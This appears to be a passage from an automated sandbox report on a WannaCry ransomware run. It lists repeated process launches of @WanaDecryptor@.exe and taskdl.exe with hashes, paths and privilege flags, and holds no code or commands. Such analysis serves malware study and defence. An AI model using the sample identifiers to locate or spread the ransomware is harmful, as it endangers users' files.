                                                                                      Has exited:true

                                                                                      Target ID:185
                                                                                      Start time:15:48:07
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:186
                                                                                      Start time:15:48:07
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:187
                                                                                      Start time:15:48:08
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:188
                                                                                      Start time:15:48:08
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:189
                                                                                      Start time:15:48:08
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:190
                                                                                      Start time:15:48:08
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:191
                                                                                      Start time:15:48:08
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:192
                                                                                      Start time:15:48:08
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:193
                                                                                      Start time:15:48:08
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:194
                                                                                      Start time:15:48:08
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:195
                                                                                      Start time:15:48:08
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:196
                                                                                      Start time:15:48:08
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:197
                                                                                      Start time:15:48:09
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:198
                                                                                      Start time:15:48:09
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:199
                                                                                      Start time:15:48:09
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:200
                                                                                      Start time:15:48:09
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:201
                                                                                      Start time:15:48:09
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:202
                                                                                      Start time:15:48:09
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:203
                                                                                      Start time:15:48:09
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:204
                                                                                      Start time:15:48:09
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:205
                                                                                      Start time:15:48:09
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x7ff714240000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:206
                                                                                      Start time:15:48:09
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:207
                                                                                      Start time:15:48:10
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:208
                                                                                      Start time:15:48:10
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:209
                                                                                      Start time:15:48:10
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:210
                                                                                      Start time:15:48:10
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:211
                                                                                      Start time:15:48:10
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:212
                                                                                      Start time:15:48:10
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      No disassembly